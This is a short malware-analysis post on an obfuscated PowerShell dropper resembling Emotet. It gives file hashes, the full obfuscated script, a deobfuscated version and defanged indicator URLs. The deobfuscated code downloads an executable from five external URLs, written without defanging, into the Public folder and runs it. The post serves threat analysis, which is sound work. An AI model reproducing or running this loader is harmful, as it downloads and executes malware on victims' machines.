I found another obfuscated PowerShell script on Hybrid Analysis and tried to deobfuscate:
MD5: 860d8897d99fe241b8a815ee45bdc618
SHA1: 0e6d2c43637aa56e6c3daa31844390451763d0a4
SHA256: c3772ca4c52135abc323bd543919e9f2724db47783fc43883054a01fdb507478
Here is the malicious PowerShell code:
. iex "('(xCL.((gv GPRxCL+xCL*MDR*GPR).nAme[3,11,2]-JOInGPRGPR)((GPROx6nsGPRxCL+xCL+GxCL+xCLPRadasd = &(LfBnLGPR+GPRfB+LfGPR+'+'GPRBexCL+xCLLfB+GPR+G'+'PRLfBw-objGPR+GP'+'ReGPR'+'+G'+'PRcLxCL+xCLfB+LfBtLGPR+GPRfGPR+GPRB) rGPR+GPRandomxCL+xCL;Ox6GPR+GPxCL+xCL'+'RxCL+xCLYYU = .(LfBneLG'+'PR+GPRfB+LfxCL+xCLBxCL+xCLwLfB'+'+G'+'PR+GPRLfB-objectLfB) SysteGPR+GP'+'Rm'+'.Net.WebC'+'lieGPR+GPRxCL+xCLnt;Ox6NSBGPR+GPR = GPR+GPROx6nsGPR+GPRadasd.next(10000, 282133);Ox6GPR+GPRAGxCL+xCLPR+GPRDCX =GPR+GPR LfGPR+GPRB xCL+xCLh'+'tGPR+GPRtp://bergindeGPR+GPRpolder.nl/EAGPR+GPRQ6Y/?htGPR+GPRtps://spGPR+GPRortshuGPR+GPRb.oGPR+GPRutGPR+GPRcome.li'+'fe/r3AGPR+GPRDGPR+GPRM/?h'+'ttGPR+GPRp://GPR+'+'xCL+xCLGPRtransportadorGPR+GPRacGPR+GPRaribGPR+GPReensGPR+GPRueGPR+GPRno.com/qIPy/?http://GPR+GPRqualiG'+'PR+GPRtyhomesoGPR+GPRnline'+'.com/pV1pGPR+xCL+x'+'CLGPRfgF/GxCL+xC'+'LPRxCL+xCL+GxCL+xCLPR?httpsGPR+GPR://GPxCL+xCLR+GPRmxCL+xCLoGPR+GPRlecule-group.rxCL+xCLu/LfSL/LGPR+GPRfGPR+GPRBGPR+GPR.GPR+GPRSpGPR+GPRlit(LGPR+GP'+'RfB?GPR+GPRLfB)GPR+GPR;Ox6SDGPR+GPRCGPR+GPR = OGPR+GPRx6env:GPR+GPRpGPR+GPRublic + LGPR+GPRfBixFLfB + GPR+GPROxGPxCL+xCLR+G'+'PR6GPR+GPRNSB + GPxCL+xCLR+GPR'+'(LfB.eGPR+GPRxLfB+GPR+GPRLfGPR+GPRBeLfGPR+GPRB);foreacG'+'PR+GPRh(Ox6asfcGPR+GPR in OxGPR+GPR6ADCGPR+GPRX){try{Ox6YYU.mwGPR+GPxCL+xCLRSGPR+GPRDGPR+'+'GPRoxCL+xCLGPR+GPRKGPxCL+'+'xCLR+GPRCkWGPR+GPRnGPR+GPRlKC'+'kOadFGPR+GPRIKCkleGPR+GPRmwS(GPR+GPROx6GxCL+xCLPR+GPRasfxCL+xCLc.mwS'+'GPR+GxCL+xCLPRTGPR+GPRoGPR+GPR'+'StrKCkiKCkNGPR+GPRgmGPR+GPxCL+xCLRwS()GPR+GPR, Ox6SGPxCL+xCLR+GPRDxCL+xCLGPR+GPRC);&(G'+'PR+GPRLfBInxCL+xCLvoLxCL+xCLfB+'+'LfBGPR+GPRkxCL+xCLLfB+LfBe-IteGPR+GPRmLfB)(GPR+GPRxCL+xCLOx6SDC)GPR+GPR;break;}caGPR+GxCL+xCLPxCL+xCLRtGPR+xCL+xCLGPRc'+'GPxCL+xCLR+GPRh{}}GPR).repLAC'+'xCL+xCLe(GPRmwSGPR,['+'STRINgxCL+xCL][cHAxCL+xCLR]34).repLACe(([cHAR]79+['+'cH'+'AR]120+[cHAR]54),GPR1xCL+xCLs5GPR).repLACe(GPRLfBGPR,[STRINgxCL+xCL]['+'cHAR]39).repLACe(([cHAR'+']105+[cHAR]1xCL+xCL20+[xCL+xCLcHAR]70),[S'+'TRINg][cHAR]92).repLACe('+'([cHAR]75+[cHAR]67+[cHAR]107),[STRINg][cHAR]96) )xCL).REPlAce(([CHar]71+[CHar]80+[CHar]82),[sTRInG][CHar]39).REPlAce(([CHar]49+[CHar]115+[CHar]53),[sTRInG][CHar]36) Nrl . ( 9xfshEllid[1]+9xfS'+'HeLlid[1'+'3]+xCLxxCL)').RePlace(([ChAr]78+[ChAr]114+[ChAr]108),[STrinG][ChAr]124).RePlace(([ChAr]120+[ChAr]67+[ChAr]76),[STrinG][ChAr]39).RePlace('9xf',[STrinG][ChAr]36)| &( $pshoME[4]+$PShOMe[34]+'x')"
After substituting strings with their corresponding replacement, I reached to:
$nsadasd = &('n'+'e'+'w-objec'+'t') random;
$YYU =.('ne'+'w'+'-object') System.Net.WebClient;
$NSB = $nsadasd.next(10000, 282133);
$ADCX = ' http://bergindepolder.nl/EAQ6Y/?https://sportshub.outcome.life/r3ADM/?http://transportadoracaribeensueno.com/q
IPy/?http://qualityhomesonline.com/pV1pfgF/?https://molecule-group.ru/LfSL/'.Split('?');
$SDC = $env:public +'\' + $NSB + ('.ex'+'e');
foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item')($SDC);break;}
catch{}}
Which seems very similar to the #emotet doc that I analyzed Analyzing virus.office.qexvmc
The malicious scripts downloads files form the following URLs:
hxxp://bergindepolder.nl/EAQ6Y/
hxxps://sportshub.outcome.life/r3ADM/
hxxp://transportadoracaribeensueno.com/qIPy/
hxxp://qualityhomesonline.com/pV1pfgF/
hxxps://molecule-group.ru/LfSL/
Malware Analysis 